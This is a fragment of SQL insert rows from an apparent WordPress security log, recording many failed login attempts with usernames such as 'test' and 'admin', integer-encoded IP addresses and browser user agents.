(103140, 1499385427.730280, 1, 'loginFailInvalidUsername', 'test', 0, 1977359605, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103141, 1499388416.540048, 1, 'loginFailInvalidUsername', 'test', 0, 772389142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103142, 1499388417.614110, 1, 'loginFailInvalidUsername', 'test', 0, 772389142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103143, 1499393121.802631, 1, 'loginFailInvalidUsername', 'test', 0, 3171753552, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103144, 1499393124.163763, 1, 'loginFailInvalidUsername', 'test', 0, 3171753552, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103145, 1499393665.797047, 1, 'loginFailInvalidUsername', 'test', 0, 2984045190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103146, 1499393668.404066, 1, 'loginFailInvalidUsername', 'test', 0, 2984045190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103147, 1499394278.577868, 1, 'loginFailInvalidUsername', 'test', 0, 3133998086, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103148, 1499395061.530887, 1, 'loginFailInvalidUsername', 'test', 0, 3144492417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103149, 1499395062.941599, 1, 'loginFailInvalidUsername', 'test', 0, 3144492417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103150, 1499402415.202996, 1, 'loginFailInvalidUsername', 'test', 0, 2942647362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103151, 1499402416.399252, 1, 'loginFailInvalidUsername', 'test', 0, 2942647362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103152, 1499405108.734752, 1, 'loginFailInvalidUsername', 'test', 0, 2886449665, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103153, 1499405110.018002, 1, 'loginFailInvalidUsername', 'test', 0, 2886449665, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103154, 1499405973.813723, 1, 'loginFailInvalidUsername', 'test', 0, 1307971246, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103155, 1499409988.651416, 1, 'loginFailInvalidUsername', 'test', 0, 3624443118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103156, 1499409990.041252, 1, 'loginFailInvalidUsername', 'test', 0, 3624443118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103157, 1499410756.204970, 1, 'loginFailInvalidUsername', 'test', 0, 1230688512, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103158, 1499410757.512695, 1, 'loginFailInvalidUsername', 'test', 0, 1230688512, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103159, 1499411412.805789, 1, 'loginFailInvalidUsername', 'test', 0, 3242697621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103160, 1499411415.011192, 1, 'loginFailInvalidUsername', 'test', 0, 3242697621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103161, 1499411745.902961, 1, 'loginFailInvalidUsername', 'test', 0, 3418413729, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103162, 1499411747.186243, 1, 'loginFailInvalidUsername', 'test', 0, 3418413729, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103163, 1499412852.873855, 1, 'loginFailInvalidUsername', 'test', 0, 2835193104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103164, 1499412854.849406, 1, 'loginFailInvalidUsername', 'test', 0, 2835193104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103165, 1499414006.843478, 1, 'loginFailInvalidUsername', 'test', 0, 1829708752, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103166, 1499414735.636451, 1, 'loginFailInvalidUsername', 'test', 0, 3524286637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103167, 1499414736.871359, 1, 'loginFailInvalidUsername', 'test', 0, 3524286637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103168, 1499422230.451542, 1, 'loginFailInvalidUsername', 'test', 0, 2963002102, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103169, 1499422231.422851, 1, 'loginFailInvalidUsername', 'test', 0, 2963002102, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103170, 1499422947.819526, 1, 'loginFailInvalidUsername', 'test', 0, 762559533, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103171, 1499422949.054095, 1, 'loginFailInvalidUsername', 'test', 0, 762559533, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103172, 1499423333.624690, 1, 'loginFailInvalidUsername', 'test', 0, 461089710, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103173, 1499423335.219139, 1, 'loginFailInvalidUsername', 'test', 0, 461089710, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103174, 1499426152.790360, 1, 'loginFailInvalidUsername', 'test', 0, 1502858165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103175, 1499426153.933988, 1, 'loginFailInvalidUsername', 'test', 0, 1502858165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103176, 1499426705.400799, 1, 'loginFailInvalidUsername', 'test', 0, 1023837075, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103177, 1499426706.822804, 1, 'loginFailInvalidUsername', 'test', 0, 1023837075, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103178, 1499427075.430162, 1, 'loginFailInvalidUsername', 'test', 0, 1302485194, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103179, 1499427076.395724, 1, 'loginFailInvalidUsername', 'test', 0, 1302485194, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103180, 1499429491.044157, 1, 'loginFailInvalidUsername', 'test', 0, 3646079390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103181, 1499429541.801375, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_30_87) AppleWebKit/532.81.29 (KHTML, like Gecko) Chrome/56.2.7061.2799 Safari/532.11 Edge/36.15109'),
(103182, 1499431963.976165, 1, 'loginFailInvalidUsername', 'test', 0, 692886810, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103183, 1499431965.163140, 1, 'loginFailInvalidUsername', 'test', 0, 692886810, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103184, 1499432214.369484, 1, 'loginFailInvalidUsername', 'test', 0, 1598917048, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103185, 1499432215.384007, 1, 'loginFailInvalidUsername', 'test', 0, 1598917048, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103186, 1499436480.513437, 1, 'loginFailInvalidUsername', 'test', 0, 778268247, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103187, 1499436481.505970, 1, 'loginFailInvalidUsername', 'test', 0, 778268247, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103188, 1499436621.408923, 1, 'loginFailInvalidUsername', 'test', 0, 3065397759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103189, 1499436622.968754, 1, 'loginFailInvalidUsername', 'test', 0, 3065397759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103190, 1499439537.346218, 1, 'loginFailInvalidUsername', 'test', 0, 831992859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103191, 1499439539.425809, 1, 'loginFailInvalidUsername', 'test', 0, 831992859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103192, 1499441304.956319, 1, 'loginFailInvalidUsername', 'test', 0, 1741064646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103193, 1499441307.061243, 1, 'loginFailInvalidUsername', 'test', 0, 1741064646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103194, 1499442606.566128, 1, 'loginFailInvalidUsername', 'test', 0, 2058258280, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103195, 1499443161.911143, 1, 'loginFailInvalidUsername', 'test', 0, 1494030525, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103196, 1499443162.916036, 1, 'loginFailInvalidUsername', 'test', 0, 1494030525, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103197, 1499445508.493886, 1, 'loginFailInvalidUsername', 'test', 0, 2580631858, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103198, 1499445509.944778, 1, 'loginFailInvalidUsername', 'test', 0, 2580631858, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103199, 1499449087.216447, 1, 'loginFailInvalidUsername', 'test', 0, 762781225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103200, 1499449088.565694, 1, 'loginFailInvalidUsername', 'test', 0, 762781225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103201, 1499451472.353190, 1, 'loginFailInvalidUsername', 'test', 0, 3111215852, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103202, 1499451473.408714, 1, 'loginFailInvalidUsername', 'test', 0, 3111215852, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103203, 1499451921.918711, 1, 'loginFailInvalidUsername', 'test', 0, 3398981251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103204, 1499451923.394816, 1, 'loginFailInvalidUsername', 'test', 0, 3398981251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103205, 1499452456.144755, 1, 'loginFailInvalidUsername', 'test', 0, 2695964079, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103206, 1499452458.375199, 1, 'loginFailInvalidUsername', 'test', 0, 2695964079, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103207, 1499453346.181901, 1, 'loginFailInvalidUsername', 'test', 0, 1578391621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103208, 1499453348.570983, 1, 'loginFailInvalidUsername', 'test', 0, 1578391621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103209, 1499453776.597636, 1, 'loginFailInvalidUsername', 'test', 0, 456755422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103210, 1499453778.058389, 1, 'loginFailInvalidUsername', 'test', 0, 456755422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103211, 1499455199.106392, 1, 'loginFailInvalidUsername', 'test', 0, 3536058953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103212, 1499455201.214011, 1, 'loginFailInvalidUsername', 'test', 0, 3536058953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103213, 1499455960.775288, 1, 'loginFailInvalidUsername', 'test', 0, 703294956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103214, 1499455962.017506, 1, 'loginFailInvalidUsername', 'test', 0, 703294956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103215, 1499456938.748345, 1, 'loginFailInvalidUsername', 'test', 0, 1581570599, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103216, 1499456939.845058, 1, 'loginFailInvalidUsername', 'test', 0, 1581570599, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103217, 1499457647.119509, 1, 'loginFailInvalidUsername', 'test', 0, 1429784052, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103218, 1499457648.164614, 1, 'loginFailInvalidUsername', 'test', 0, 1429784052, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103219, 1499458774.778319, 1, 'loginFailValidUsername', 'admin', 1, 1091807107, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(103220, 1499461060.363201, 1, 'loginFailValidUsername', 'admin', 1, 1839458824, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7'),
(103221, 1499461065.580209, 1, 'loginFailValidUsername', 'admin', 1, 2961112076, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7'),
(103222, 1499461404.368991, 1, 'loginFailInvalidUsername', 'test', 0, 694160952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103223, 1499461405.483350, 1, 'loginFailInvalidUsername', 'test', 0, 694160952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103224, 1499462496.806803, 1, 'loginFailInvalidUsername', 'test', 0, 1321671518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103225, 1499462497.860029, 1, 'loginFailInvalidUsername', 'test', 0, 1321671518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103226, 1499469619.624797, 1, 'loginFailInvalidUsername', 'test', 0, 782623857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103227, 1499469620.831025, 1, 'loginFailInvalidUsername', 'test', 0, 782623857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103228, 1499476695.218279, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.85.38 (KHTML, like Gecko) Chrome/56.3.9767.4039 Safari/534.46 OPR/44.5.0580.5852'),
(103229, 1499479516.941897, 1, 'loginFailInvalidUsername', 'test', 0, 3142512570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103230, 1499479518.540140, 1, 'loginFailInvalidUsername', 'test', 0, 3142512570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103231, 1499483664.415407, 1, 'loginFailInvalidUsername', 'test', 0, 1866703826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103232, 1499483666.395214, 1, 'loginFailInvalidUsername', 'test', 0, 1866703826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103233, 1499487408.126070, 1, 'loginFailInvalidUsername', 'test', 0, 3357589674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103234, 1499487409.318339, 1, 'loginFailInvalidUsername', 'test', 0, 3357589674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103235, 1499492032.716254, 1, 'loginFailInvalidUsername', 'test', 0, 1422551407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103236, 1499492033.950938, 1, 'loginFailInvalidUsername', 'test', 0, 1422551407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103237, 1499493370.380315, 1, 'loginFailInvalidUsername', 'test', 0, 3032368051, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103238, 1499493371.949160, 1, 'loginFailInvalidUsername', 'test', 0, 3032368051, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103239, 1499496098.477501, 1, 'loginFailInvalidUsername', 'test', 0, 1242341658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103240, 1499496099.634621, 1, 'loginFailInvalidUsername', 'test', 0, 1242341658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103241, 1499496253.612508, 1, 'loginFailInvalidUsername', 'test', 0, 2995178620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103242, 1499496254.684542, 1, 'loginFailInvalidUsername', 'test', 0, 2995178620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103243, 1499498183.850119, 1, 'loginFailInvalidUsername', 'test', 0, 1143591573, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103244, 1499498184.994760, 1, 'loginFailInvalidUsername', 'test', 0, 1143591573, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103245, 1499498990.547522, 1, 'loginFailInvalidUsername', 'test', 0, 2023437073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103246, 1499498992.325459, 1, 'loginFailInvalidUsername', 'test', 0, 2023437073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103247, 1499501952.820130, 1, 'loginFailInvalidUsername', 'test', 0, 1124218043, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103248, 1499503443.915188, 1, 'loginFailInvalidUsername', 'test', 0, 3136808888, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103249, 1499503445.298515, 1, 'loginFailInvalidUsername', 'test', 0, 3136808888, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103250, 1499506662.248021, 1, 'loginFailInvalidUsername', 'test', 0, 3165405706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103251, 1499506663.355240, 1, 'loginFailInvalidUsername', 'test', 0, 3165405706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103252, 1499507571.542063, 1, 'loginFailInvalidUsername', 'test', 0, 1545935912, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103253, 1499507572.562232, 1, 'loginFailInvalidUsername', 'test', 0, 1545935912, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103254, 1499507901.586498, 1, 'loginFailInvalidUsername', 'test', 0, 2942657433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103255, 1499507903.265082, 1, 'loginFailInvalidUsername', 'test', 0, 2942657433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103256, 1499510534.266406, 1, 'loginFailInvalidUsername', 'test', 0, 1579325406, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103257, 1499510535.363284, 1, 'loginFailInvalidUsername', 'test', 0, 1579325406, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103258, 1499514323.854951, 1, 'loginFailInvalidUsername', 'test', 0, 2399104775, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103259, 1499514325.006298, 1, 'loginFailInvalidUsername', 'test', 0, 2399104775, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103260, 1499516966.582550, 1, 'loginFailInvalidUsername', 'test', 0, 736330760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103261, 1499516968.068386, 1, 'loginFailInvalidUsername', 'test', 0, 736330760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103262, 1499518760.357705, 1, 'loginFailInvalidUsername', 'test', 0, 1208727579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103263, 1499518761.496322, 1, 'loginFailInvalidUsername', 'test', 0, 1208727579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103264, 1499520297.414146, 1, 'loginFailInvalidUsername', 'test', 0, 1287243095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103265, 1499520298.858691, 1, 'loginFailInvalidUsername', 'test', 0, 1287243095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103266, 1499520335.671251, 1, 'loginFailInvalidUsername', 'test', 0, 1705472359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103267, 1499520337.202662, 1, 'loginFailInvalidUsername', 'test', 0, 1705472359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103268, 1499521646.582705, 1, 'loginFailInvalidUsername', 'test', 0, 84712992, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103269, 1499521758.930158, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103270, 1499521759.259855, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103271, 1499521759.569018, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103272, 1499521759.878483, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103273, 1499521760.188077, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103274, 1499521760.499795, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103275, 1499521760.808017, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103276, 1499521761.117550, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103277, 1499521761.427043, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103278, 1499521761.736765, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103279, 1499521762.046861, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103280, 1499521762.355870, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103281, 1499521762.665666, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103282, 1499521762.979078, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103283, 1499521763.371485, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103284, 1499521763.681342, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103285, 1499521763.990832, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103286, 1499521764.300321, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103287, 1499521764.609840, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103288, 1499521919.635035, 1, 'loginFailInvalidUsername', 'test', 0, 2081236943, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103289, 1499521921.121204, 1, 'loginFailInvalidUsername', 'test', 0, 2081236943, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
